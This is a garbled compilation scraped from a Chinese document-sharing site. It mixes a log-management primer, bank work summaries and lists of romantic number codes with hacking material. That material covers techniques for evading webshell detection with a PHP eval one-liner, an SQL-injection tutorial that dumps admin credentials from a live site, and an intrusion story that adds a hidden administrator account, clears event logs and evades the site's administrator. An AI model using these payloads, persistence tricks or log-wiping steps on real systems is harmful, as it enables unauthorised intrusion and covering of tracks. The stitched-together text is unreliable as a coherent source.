日志管理与分析-日志收集及来源 【前言】 对广大IT工作者，尤其是运维和安全人员来说，“日志”是一个再熟悉不过的名词。日志从哪来？机房中的各种软件（系统、防火墙）和硬件（交换机、路由器等），都在不断地生成日志。IT安全业界的无数实践告诉我们，健全的日志记录和分析系统，是系统正常运营、优化以及安全事故响应的基础，虽然安全系统厂商为我们提供了五花八门的解决方案，但基石仍是具有充足性、可用性、安全性的日志记录系统。实际工作中，许多单位内部对日志并没有充分的认识，安全建设更多在于投入 设备，比如防火墙、IDS、IPS、防病毒软件等，被动地希望这些系统帮助我们完成一切工作，但是俗话说的好：“魔高一尺道高一丈”，以特征码和预定义规则为基础的上述设备，在防护方面永远落在攻击者后面，防微杜渐才是真正的出路。作为一名合格的安全人员，了解日志的概念，了解日志的配置和分析方法，是发现威胁、抵御攻击的重要技能，有了这方面的深刻认识，各种自动化安全解决方案才能真正地发挥效能。 1、日志数据 简单地说，日志消息就是计算机系统、设备、软件等在某种触发下反应生成的东西。确切的触发在很大程度上取决于日志消息的来源。例如，UNix操作系统会记录用户登录和注销的消息，防火墙将记录ACL 通过和拒绝的消息，磁盘存储系统在故障发生或者在某些系统认为将会发生故障的情况下会生成日志消息。 日志数据就是一条日志消息里用来告诉你为什么生成消息的信息，例如，web服务器一般会在有人访问web页面请求资源（图片、

文件等等）的时候记录日志。如果用户访问的页面需要通过认证，日 志消息将会包含用户名。日志消息可以分成下面的几种通用类型： ?信息：这种类型的消息被设计成告诉用户和管理员一些没有风险的事情发生了。例如，Cisco IOS将在系统重启的时候生成消息。不过，需要注意的是，如果重启发生在非正常维护时间或是业务时间，就有发出报警的理由。 ?调试：软件系统在应用程序代码运行时发生调试信息，是为了给软件开发人员提供故障检测和定位问题的帮助。 ?警告：警告消息是在系统需要或者丢失东西，而又不影响操作系统的情况下发生的。 ?错误：错误日志消息是用来传达在计算机系统中出现的各种级别的错误。例如，操作系统在无法同步缓冲区到磁盘的时候会生成错误信息。?警报：警报表明发生了一些有趣的事，一般情况下，警报是属于安全设备和安全相关系统的，但并不是硬性规定。在计算机网络中可能会运行一个入侵防御系统IPS，检查所有入站的流量。它将根据数据包的内容判断是否允许其进行网络连接。如果IPS检测到一个恶意连接，可能会采取任何预先配置的处置。IPS会记录下检测结果以及所采取的行动。 2、日志数据的传输与收集 计算机或者其他设备都实现了日志记录子系统，能够在确定有必 要的时候生成日志消息，具体的确定方式取决于设备。另外，必须有 一个用来接收和收集日志消息的地方，这个地方一般被称为日志主 机。日志主机是一个计算机系统，一般来说可能是linux和windows服

银行服务管理工作总结

银行服务管理工作总结 导语：全力抓好检查制度的落实。今年我们坚持每月定期不定期的对网点进行检查，按照省分行的有关要求，以下xx为大家介绍文章，仅供参考! 篇一 20xx年，在市分行党委的正确领导下，我们认真贯彻落实省分行年初制定的“服务立行、服务兴行、服务出效益、服务是核心竞争力”的经营理念。多次召服务工作联系会议，专题研究和安排部署服务工作，通过集中整治，全行的服务工作有了明显的好转，客户投诉率明显下降。主要抓了以下几项工作。 一、主要工作措施 1、从年初开始，我们将服务工作作为全行的重点工作，结合我行的实际，及时制定了服务管理考核办法和各项具体实施规定，并认真贯彻执行；市分行制定了“内部承诺奖励处罚办法”，重新修订《服务工作检查考核办法》，《工会工作目标管理考核办法》、《客户投诉管理办法》等，使服务工作的管理制度更加完善，达到系统化、规范化。并汇集成册，下发各行组织员工进行学习和讨论。 2、市分行党委十分重视服务工作，在工作安排、检查、总结时都有服务工作的内容，由一把手负总责，分管领导专

门抓、主管部门具体抓，专业部门配合抓，初步形成全行齐抓共管的大服务格局，员工服务意识的提高和服务质量的进一步增强，在客户中产生良好影响，保证了各项业务健康有序的开展。在今年五月份，在市分行党委的高度重视下，专门召开了服务工作整改动员大会，xx支行班子成员和网点负责人共计100余人参加了会议。市分行党委书记xx同志作了重要讲话，xx部、xx部等部门的负责人作了承诺发言，向一线员工做出了郑重承诺，要求监督执行。网点负责人和员工代表也作了表态发言。会后我们将会议材料汇集成册下发执行，为全年服务工作的顺利开展起到较好推动作用。 3、服务工作纳入行长经营目标管理考核。年初、由市分行分管领导与各支行、城区各网点负责人签订服务工作目标责任书，明确考核的内容，强化服务的管理。并在绩效工资的发放中，专门将服务工作纳入考核，占比为10%，每季由服务办打分考核，与绩效工资挂钩奖罚兑现。有力地推动了优质文明服务工作的开展。 4、立足实际，建设网点。为了突出服务品牌，扩大xx 行影响，市分行对地处繁华路段、客流量较大的xx支行、xx支行和xx支行营业室，按照网点的标准进行了装修改造。安装了标准化户外标牌，分设了现金区、非现金区、个人理财区和客户休息区，使网点的布局多功能化，充分体现了人性化特点，及时适应了不同层次客户群体的服务需求，提升

爱情数字密码大全2020年

爱情数字密码大全2020年导读：爱情语录爱情数字密码大全2020年 1、259695：愛我就了解我 2、737421：今生今世爱你 3、21161：爱你一万年 4、1392010：一生就爱你一人 5、51095：我要你嫁我 6、235：要想你 7、52406：我爱死你啦 8、53517230：我想我已经爱上你 9、53406：我想死你啦 10、20999：爱你久久久 11、5260：我暗恋你 12、5201314：我愛你一生一世 13、57350：我只在乎你 14、54335：无事想想我 15、2137：为你伤心 16、2030999：爱你想你久久久 17、20161：爱你一万年 18、04535：你是否想我 19、74074：去死你去死 20、3456：相思无用

21、619：到永久 22、360：想念你 23、21111：爱你一亿年 24、137：一生情 25、51820：我已不爱你 26、74839：其实不想走 27、5843344521：我发誓生生世世我爱你 28、20110：爱你一百一十年 29、915：就要吻 30、08056：你不理我了 31、1392010：一生就爱你一个 32、21999：爱你久久久 33、241：爱死你 34、51020：我依然爱你 35、441295：谢谢你爱过我 36、2627：爱来爱去 37、2037：为你伤心 38、32062：想念你的爱 39、3344：生生世世 40、721：亲爱你 41、04551：你是我唯一 42、7731：心心相印

43、02746：你恶心死了 44、25873：爱我到今生 45、2925184：爱就爱我一辈子 46、517680：我一定要追你 47、827474：被爱才是幸福 48、3399：长长久久 49、207374：爱你七生七世 50、59420：我就是愛你 51、045617：你是我的氧气 52、20609：爱你到永久 53、1314：一生一世 54、93110：好想见见你 55、70345：请你相信我 56、732016：今生愛你一人 57、540186：我是你女朋友 58、51930：我依旧想你 59、9694482664：我喜欢你 60、0564335：你无聊时想想我 61、147796：一世亲亲就留 62、940194：告诉你一件事 63、25184：爱我一辈子 64、73748196：今生今世伴你左右

常见的webshell检测方法及绕过思路

常见的webshell检测方法及绕过思路 一句话webshell基本结构： 两个步骤：数据的传递、执行所传递的数据 数据的传递&绕过检测 对于数据的传递，我们通常的做法是$_GET/$_POST/$_SERVER/$_COOKIE等获取客户端数据，但是这类关键词直接出现的话，可以很容易回溯到，我们有以下集中方案来解决： 1.利用本身所在的框架 2.利用变种：${“_G”.”ET”}。不过这种不过这种方式也有自身的缺点，可以跟踪“${”；不过这种跟踪又可以通过“$/*a*/{”这种方式绕过（当然其又有被跟踪的可能性）。 3.使用其他数据获取方式来获取数据，譬如$_REQUEST、$GLOBALS[“_GET”]、$_FILE等。 4.人为构造语言缺陷或应用漏洞，并且这种缺陷是不易察觉的，譬如伪造管理 员session等。 数据执行&绕过检测 对于数据执行，我们通常使用的函数或方式有：eval、create_function、``、exec、preg_replace等。当然这类关键词如果直接出现的话，我们的自动化webshell检测脚本可以很轻易的进行识别，目前看我们可以绕过检测的方案较少： 1、通过$a()这种方式来执行函数。不过这种方式也有自身规律在里面，有很多扫描器已经内置了“$.*($.*”这种规则，同样我们可以通过$a/*a*/()这种方式以及相应的变通方式来绕过。（当然其又有被跟踪的可能性） 2、尝试去找到不在黑名单中的函数，或者极其常见的函数。 两句话webshell $a = $_GET[‘a’];eval($a);

银行后台柜员工作总结

银行后台柜员工作总结 篇一XX银行柜员工作总结 银行柜员年终总结 时间飞逝，光阴如梭。在忙碌而充实的工作中我们度过了意义非凡的XX年。回顾一年的所有工作令人欣喜。在支行各级领导的带领和分理处主任的指导及同事间共同努力下，我们积极学习业务知识，增加各项业务技能水平，认真履行工作职责，时刻谨记内控制度，圆满完成了全年各项工作指标，在思想觉悟、业务素质、操作技能、优质服务等方面都有了较好提高。现将一年的工作情况总结如下 一、主要工作内容及职责 本人于XX年6月入职，从事综合柜员一职。平日工作主要有柜面对私业务、对公业务、代发工资、反洗钱信息补录等。看似简单的操作，却需要平日多积累多学习操作流程，日益更新，专注、仔细、耐心对待每一笔业务的发生与审核，尤其是对公业务。一个月的支票处理量相对较大，为了减少退票率，也为了提高自己处理对公业务水平，我坚持对每一张票据各个要素进行认真审核，高标准严格要求自己及客户填写规范。伴随着每笔业务发生的同时，也将内部控制制度铭记于心，七步服务流程做到大方得体，将各项政策落到实处。 二、我的收获与成长 我很庆幸自己能够加入农商行，成为其中的一员，工作近一年的时间里，我的价值观和人生观都有个较大的改变，她让我相信人生一切皆有可能，只要自己肯努力创造。当然也只有能为企业做出奉献，才能实现自己的价值。首先，在一个工作团体里，大家要团结一致，互助进取，因为团结是取得互利共赢的前提；其次，做好自己的本职 工作是基本要求，作为一个柜员应该懂得自己该做什么，什么不能做，有主见有胆识；另外，客户是我们发展的主体，服务好客户是我们的职责，研究客户，通过对客户的研究从而达到了解客户的业务需求，力争使每一位客户满意，通过自身的努力来维护好每一位客户；当然，通过对业务的熟悉和对企业内部控制的了解之后，能为企业的一些潜在的漏洞或发展提出建设性的意见是我们份内之事，也是为企业能做的较好的贡献。 在市场竞争日趋激烈的今天，在具有热情的服务态度，娴熟的业务能力的同时，还必须要不断的学习，提高自己各方面的能力水平，才能向客户提供更高效率、更优质的服务。我行举办的各类培训和技能考核为我尽快提高业务技能提供了有力的保障。我始终积极参加各类培训，坚持认真听课，结合平时学习的规章制度和法律法规，努力提高着自己的业务能力水平。通过一段时间的工作，我深刻体会到银行是一个高风险的行业，办理每一笔业务都要注意到每一个小细节 和要素，它可以是一个复核、一个签章、一个客签名、一个手印、一个登记、一个交易码。一笔业务可能涉及到很多个细节问题，如果因为粗心大意，不用心想，漏掉一个没有做到，都有可能存在风险，就比如放贷款。细节不是儿戏，需要我们严肃对待。严格把守每一

爱情数字密码大全2019

爱情数字密码大全2019 27、5843344521：我发誓生生世世我爱你 28、20110：爱你一百一十年 29、915：就要吻 30、08056：你不理我了 31、1392010：一生就爱你一个 32、21999：爱你久久久 33、241：爱死你 34、51020：我依然爱你 35、441295：谢谢你爱过我 36、2627：爱来爱去 37、2037：为你伤心 38、32062：想念你的爱 39、3344：生生世世 40、721：亲爱你 41、04551：你是我唯一 42、7731：心心相印 43、02746：你恶心死了 44、25873：爱我到今生 45、2925184：爱就爱我一辈子

46、517680：我一定要追你 47、827474：被爱才是幸福 48、3399：长长久久 49、207374：爱你七生七世 50、59420：我就是愛你 51、045617：你是我的氧气 52、20609：爱你到永久 53、1314：一生一世 54、93110：好想见见你 55、70345：请你相信我 56、732016：今生愛你一人 57、540186：我是你女朋友 58、51930：我依旧想你 59、9694482664：我喜欢你 60、0564335：你无聊时想想我 61、147796：一世亲亲就留 62、940194：告诉你一件事 63、25184：爱我一辈子 64、73748196：今生今世伴你左右 65、045692：你是我的最爱 66、9494：就是就是 67、356：上网啦

68、51620：我依然爱你 69、7087：请你别走 70、300：想你哦 71、59240：我最爱是你 72、230：爱死你 73、77895：紧紧抱着我 74、912535：求你爱我想我 75、1314925：一生一世就爱我 76、59520：我永远爱你 77、9918875：求求你别抛弃我 78、1372：一厢情愿 79、54033：我是你先生 80、2010000：爱你一万年 81、745421：其实我是爱你 82、54920：我始终爱你

银行后台年度工作总结文档2篇

银行后台年度工作总结文档2篇Annual work summary document of bank back office 汇报人：JinTai College

银行后台年度工作总结文档2篇 小泰温馨提示：工作总结是将一个时间段的工作进行一次全面系统的总检查、总评价、总分析，并分析不足。通过总结，可以把零散的、肤浅的感性认识上升为系统、深刻的理性认识，从而得出科学的结论，以便改正缺点，吸取经验教训，指引下一步工作顺利展开。本文档根据工作总结的书写内容要求，带有自我性、回顾性、客观性和经验性的特点全面复盘，具有实践指导意义。便于学习和使用，本文下载后内容可随意调整修改及打印。 本文简要目录如下：【下载该文档后使用Word打开，按住键盘Ctrl键且鼠标单击目录内容即可跳转到对应篇章】 1、篇章1：银行柜员20xx年度个人工作总结文档 2、篇章2：银行人员个人年度工作总结文档 导读：在将来迎来的一年中，我会继续努力，将我的工 作能力提高到一个新的档次，不辜负大家对我的期望，我会尽我所能的工作，帮助我行实现发展，相信我行的明天会更好! 以下是由小泰J.L为您整理推荐的银行年度工作总结，欢迎参考阅读。 篇一：银行人员年度个人工作总结 一、一年来的学习工作情况

1、在学习上更加注重“三个加强，三个提高”。 一是加强政治学习，不断提高自己的思想政治觉悟和政治理论水平。结合支行今年开展保持共h产j党员先进性教育活动，系统的、认真的学习了马克思主义的哲学、政治经济学理论读本、毛主席的为人民服务、邓小平建设有中国特色的社会理论和三个代表的重要思想，做学习笔记三万余字，写心得体会有10余篇，通过学习使自己的人生观、世界观、价值观得到了彻底的改造，自己的思想觉悟又得到了进一步的提高。 二是加强对业务知识的学习，不断提高自己的业务素质和业务能力。按照支行党组、行长的工作分工安排，我主要协助行长分管办公室、货币信贷统计股、外汇管理股的工作，这三个股室的工作业务性都比较强，为此，在平时的工作中，我注意测重加强对这个三股室业务知识的学习。利用业余时间学习了新的办公室公文起草、公文处理、科技方面的计算管理;货币信贷管理操作、征信管理、货币政策、金融稳定、信用环境建设、农村信用社改革;外汇管理的结、售汇管理、收汇核销的操作等等。从制度规定到操作程序、操作规程、风险控制等都有了进一步的了解。 三是加强了对管理知识的学习，提高自身对分管工作组织与协调的能力。管理是一门科学，也是门艺术，只有通过不

爱情数字密码大全

爱情数字密码大全 导读：本文是关于语录大全的文章，如果觉得很不错，欢迎点评和分享！ 1、51120：我依然爱你 2、8834761：漫漫相思只为你 3、20863：爱你到来生 4、3113：想你一生 5、135：要想我 6、0457：你是我妻 7、9950：久久吻你 8、780：牵挂你 9、729：去喝酒 10、9421：就是爱你 11、837：别生气 12、543720：我是真心爱你 13、30920：想你就爱你 14、910：就依你 15、234：爱相随 16、5460：我思念你 17、201701：爱你一千年 18、8384：不三不四

19、5360：我想念你 20、1798：一起走吧 21、25965：爱我就留我 22、095：你找我 23、70：親你 24、2013614：爱你一生又一世 25、574839：我其实不想走 26、8006：不理你了 27、291314：爱就一生一世 28、57410：我心属于你 29、902535：求你爱我想我 30、8050：抱你吻你 31、740：气死你 32、4422335：时时刻刻想想我 33、0487561：你是白痴无药医 34、9908875：求求你别抛弃我 35、1414：要死要死 36、1314920：一生一世就爱你 37、210：爱你哦 38、3013：想你一生 39、706：起来吧 40、8074：把你气死

41、1573：一往情深 42、530184：我想你一辈子 43、530：我想你 44、5240：我爱是你 45、18340：一把扇死你 46、21475：爱你是幸福 47、330335：想想你想想我 48、771880521：亲亲你抱抱你我爱你 49、04567：你是我老妻 50、860：不留你 51、53880：我想抱抱你 52、554528096：我无时无刻伴你左右 53、02825：你爱不爱我 54、065：原谅我 55、765：去跳舞 56、0487：你是白痴 57、54074：我是你妻子 58、510170：我一定要娶你 59、76868：去溜达溜达 60、1930：依旧想你 61、1711：一心一意 62、53770：我想亲亲你

(零基础)手工注入+burpsuite拿webshell

之前由于不会安装vm版的bt5而在网上求救，结果认识了一找不到片的基友，00后的，，感觉顿时无语了…………聊天时，他说sqlmap 和burpsuite都很强大…………玩完sqlmap后，就一直想学burpsuite来着，，但是一直都没学，这几天才刚开始完的…………感觉确实强大，能够拦截，查看和修改网站流量………………不废话，开始 目标站，https://www.sodocs.net/doc/e72668042.html,(不要问我怎么找的……百度高级搜索inurl:asp?id=XX) 点一链接，在网站后加 and 1=1 回车，页面正常，，加and 1=2 ,回车，不正常，，，判断存在sql 注入漏洞（当然存在啊，不然怎么做教程，只是说下如何判断注入） 然后order by 查询字段（是叫做字段吗，我对概念不清楚，虽然我为这还自学了mysql……暂且叫字段吧） 如图，12不正常，11正常，说明字段为11（11之前的都正常）

然后在地址后加入 union select 1，2，3，4，5，6，7，8，9，10，11 from admin,也就是访问 https://www.sodocs.net/doc/e72668042.html,/show_content.asp?id=1361 union select 1，2，3，4，5，6，7，8，9，10，11 from admin（别问我admin哪来的，，微软access数据库默认的表，也不能说是默认的吧，大多都是这样，下面的username和password也是这样），看图吧 看到2 3 没，爆出查询点了，，把2换成username，3换成password（当然2换成password，3为username也行），回车，如图 username为admin，，密码为MD5加密的值，拿去解密，如图

银行 工作总结工作总结

银行工作总结工作总结 xx年对支行来讲，是辛勤耕耘的一年，是适应变革的一年，是开拓创新的一年，也是理清思路、加快发展的一年。在全体员工的共同努力下，**路支行坚持年初制订的工作思路，克服重重困难，团结一致，勇于开拓，在坚持规范经营、防范风险的前提下，以发展为主线，以利润为目标，以高品质、专业化服务为手段，积极扩展市场、创新产品、培育客户，实现了各项业务的全面、快速增长。现将xx 年工作情况汇报如下： 一、经营业绩 1、负债业务：截至11月底，我行全口径存款时点达到60978万元，较年初增长2358万元，其中对公存款余额达28614万元，较年初增长1525万元，储蓄存款时点余额32364万元，较年初增长833万元。截止11月底全年全口径日均存款余额为60625万元，较年初增长1020万元，其中对公存款日均已浮出水面，较年初正增长39万元，余额为27517万元;储蓄存款日均余额为33108万元，较年初新增981万元。 2、资产业务：截止11月底，我行贷款余额为40273万元，比年初新增万元。9月底，我行向**项目成功营销4亿元贷款，并分别于9月底投放2亿元、11月置换1亿元固定资产贷款，有效调整了我行的贷款结构，提高了利息收入水平。同时，我行今年在房地产项目贷款营销上也取得了较好的成绩，分别营销**、**两家优质房地产企业贷款各5000万元，为我行房地产金融业务打下了良好的基础。

全年累计收息达到634.26万元，资产质量良好。全年累计签发银行承兑汇票达13189万元，手续费收入达到6.6万元。 3、中间业务：今年我行对中间业务收入的认识有了较大的提高，并积极拓展中间业务收入的各种渠道，积极组织收入，提高收益水平。截止11月底，全年累计中间业务收入达172万元，比去年增速达到215%。其中10月份我行收到第一笔财务顾问收入7.5万元，以及国际结售汇收入2800元，开拓了新的中间业务空间。代理发售国债1651万元，基金1300万元，信托280万元，各类保险25万元，理财产品中间业务收入达到**万元。 4、国际业务：今年我行国际业务有了较大的进展。通过营销**科技、**等有进出口业务的贸易企业，我行仅10月和11月就完成对公企业国际结售汇82.59万元，国际结算量达到71.71万元。11月，经上级行批准我行开办外汇储蓄业务后，我行积极行动，对前台员工进行多次国际业务培训，悬挂宣传条幅进行业务推介，并在较短的时间内开始办理业务，为我行今后国际业务和外汇理财业务的发展奠定了坚实的基础。 5、电子银行业务：为了给客户提供方便快捷的高科技服务，减轻前台压力，今年我行对电子银行业务的发展提出了较高的目标。截止11月底，我行共发展企业网银客户14户，个人网银273户，CALLCENTER签约287户，网银结算量达到32393万元。 6、其他方面：xx年**路支行在结算服务、核算质量、安全生产等方面也取得了一定的成绩，实现全年安全生产无事故。同时也积

一次简单但又完整的先拿shell后提权的经历

. 一次简单但又完整的先拿shell后提权的经历 前一段时间看到了易趣购物网站爆出了注入漏洞，注入的关键字是关键字： inurl:Price.asp?anid=，结合系统本身的后台数据库备份生成目录可以自定义漏洞，轻松可以通过备份xxx.asp的目录，然后上传后缀为jpg的一句话木马，菜刀连之即可得到shell。 但是如果是这样我也不会再写此文，在这些购物网站中，数据最重要的当属减肥丰胸等等网站数据，而且这些网站在优化seo时，肯定设置的关键字也是减肥丰胸之类，那么中文标题之中必有此关键字，那我的想法就产生了，我的新的注入关键字产生了nurl:Price.asp?anid= intitle:减肥。 啊d扫描注入点，找到一个注入点https://www.sodocs.net/doc/e72668042.html,/Price.asp?anid=xxx,拿去跑表段字段即可，不过也得注意表段是特有的Cnhww。我一般在渗透的时候，也会用jsky和御剑检测站点，在我查看御剑的结果时发现了一个让我欣喜的结果https://www.sodocs.net/doc/e72668042.html,/shell.asp，明白的一看便知是先人后门，打开发现是一个小马， （原有小马一被我清除，此图是后来补的），复制大马代码保存，即得到shell。 扫描端口发现，网站开启了

连接3389端口发现可以连接， 尝试简单的命令猜解失败后，决定重新利用shell。查看服务器所支持的组件：

发现可以支持fso和wscript.shell，欣喜往外，ipconfig，net user都支持，查看了当前的账户，有一个默认的administrator管理账户。但是net user admin admin /add，没任何反应，net user 发现并没有添加账户成功，这里很纳闷，决定换思路。把网站翻了个遍，发现了一个数据库的链接文件。 通过代码可知，这里数据库使用了acess和mssql两个，mssql数据库连接账号和密码都已知晓，何不利用数据库连接器试一试，然后兴奋的分别用了MSSQL连接器、SQLTools、SQL查询分析器分离版本，但皆以失败而告终，都拒绝连接不上,看来是防火墙对1433端口做了从外到内的限制，悲哀。。。 就在这个时候，忽然想起来，啊d等软件在mssql数据库sa权限下，皆有列目录和执行dos的权限，何不试试，然后用啊d 执行命令net user admin admin /add & net localgroup administrators admin /add，但是好久都没回显，很卡的样子，就又换了hdsi，一举成功。 注意这里建立admin是为了方便检测新否已经建立账户，要做一个好的后门，是要做克隆账户的。心情愉悦的3389连之，为了防止管理员net user查到新建的账户，我建立了隐藏账户，即是admin$,这种账户在cmd中时发现不了的，但是查询用户组还是一览无遗。我当时没在意觉得没什么，然后速度在日志查看器中删除了所有日志，（这个我也不想，不过好似没法删除单一的登陆记录，请大牛指点指点），正在这时，忽然事件查看器中多了一条登录审核信息，我一看管理员来了，吓得我急忙注销电脑，灰溜溜的跑了。。。。 大约过了1个小时吧，我又重新登录，账号还在，管理员确实很马虎额，不过自己可不能再大意了，遂决定建立克隆账户。 然后就用shell上传aio.exe文件，竟然失败，然后用菜刀上传也是失败，真是无语。看来是权限不够，忽然想到3389现在不是支持复制粘贴吗？忽然觉得思路就是被逼出来的，

收集日志的方法

收集日志的方法（V5.5及以下版本） 刘奇liuqi@https://www.sodocs.net/doc/e72668042.html,2010-9-14 说明：本文档非本人编写，为深圳同事总结。 举例说明，怎样把程序出错时，或者程序运行慢的前台界面现象截图，前台详细日志，后台详细日志收集和提交。 1. 某客户查询凭证时，前台报错。 2.下面介绍怎样把日志收集完整给开发, 在打开这个出错节点之前，我们先打开前台日志，在程序的右上角上一个日志按钮, 并把log level设置为debug, 按clear 按钮清除之前的日志，让收集的日志更为准确 3.在服务器端运行wassysconfig.bat—log- 日志配置http://localhost:88 –读取（中间件必须在启动状态）,下图中88为nc的web访问端口，如果是80端口访问nc,请在此输入80. 把anonymous和nclog 级别设置为debug,滚动策略中最大字节设置为10m,最大文件数设置为20,并按保存。如下图，这个时候，所在访问nc服务器的88端口的操作，将会有debug输出到指定目录的指定文件。（ncv5产品是可以动态打开和关闭日志，不需要重新启动中间件才生效）

4．在服务器端打开日志目录D:\ufida\ufsoft\nclogs\server1，按日期排序日志文件，记下nc-log 和anony-log当前正在输出的文件（可能有很多nc-log和anony-log文件，要记住正在输出的最新的日志文件），如下图nc-log[0].log和anony-log[0].log是正在输入的日志文件 1.准备工作都完成了，我们需要把问题重现一次。以便生成日志并提交给开发。如下图， 我们操作凭证查询，界面报错，我们可以使用键盘上的prtscreen键直接截图到word文件，把前台直接看到的错误保存下来。 2.问题重现后，我们立即去把后台日志的级别设置为error,并保存。防止其他用户操作nc 产生大量的日志输出，不便查找我们所要的信息，如下图

银行运营部工作总结

银行运营部工作总结 篇一：银行运营部年度工作总结报告 时光飞逝，转眼我进入XX银行XX分行已经有半年多的时间了，银行工作岗位众多、卧虎藏龙，个个都本事非凡，取他人之长补己之短，是每个新人快速成长不断提高的保障。众多领导、各位师傅前辈无私的将自己的经验教训传授于我，使我在快速成长的路上少走了不少弯路，通过和他们持续的交流不断的修正自己的方向，我也得以努力的快乐成长。在这短暂又宝贵的半年时间中我先后在个贷管理部和分行运营部实习，银行的岗位众多最后在多方领导的安排照顾下，在运营部找到了专业对口，自己也非常满意和珍惜的运营核算工作。 在半年的工作实习中，我收获良多。 首先，在各位前辈的帮助和教导下，对银行运营条线的工作性质有了初步认知。运营条线工作量大，风险点较多，工作错不得，一次操作失误将会给银行的资金和声誉造成无法挽回的损失，因此对待这份工作要抱有敬畏之心，不敢有半分的倦怠和随意。核算中心虽然不直接和客户打交道，但在后台的操作中会对客户资金起举足轻重的作用，例如在对待资金落地的处理上若有一刻怠慢就会造成汇路的不畅通，给XX银行的客户造成不必要的麻烦。因此对待在核算中心的工作还要有时间意识，学会和时间赛跑，在出现类似资金

落地的情况时要在第一时间作出准确判断并予以解决。核算中心的工作还要求我们有极强的风险防控意识，妥善保管带有XX银行字样的业务印章及其他重控物件，工作中双人复核等等要求都让我意识到今后工作岗位的重要性。 其次，在XX的细心呵护下，在XX和XX的无私帮助下，我学习了一部分核算中心的工作要点和账务处理。包括大小额资金调缴同城银联打印报表装订传票等等，在学习中我见识到前辈对工作负责认真的态度和她们的专业素养，我渴望早日成为像她们那样优秀的核算中心员工。 最后，通过参与XX年底的全面对账和XX年一季度的重点对账工作，我对银企对账工作流程和重要性有了初步的了解。①银对账催收要善于于客户沟通。银对账的催收工作通常是通过电话与企业财务人员取得联系的，没有面对面的接触，如何让客户接受我的工作，并配合我完成上银行的对账点击这着实让我下了一些功夫。我认为首先语音要柔和，通过亲和力取得客户的信任。其次是发送准确的指令，譬如在实际工作中我发现给客户说“尽快点击”往往没有明显的效果，而通知客户“我行现在正在集中办理银对账工作，需要在两个工作日中完成操作”则明确向客户传达出来两个工作日的时间要求，帮助客户尽快完成银的点击，达到了比较好的效果。最后当然就是一而再再而三的“轰炸式”催收了，这对于那些不是特别愿意配合的客户还是取得了一定的效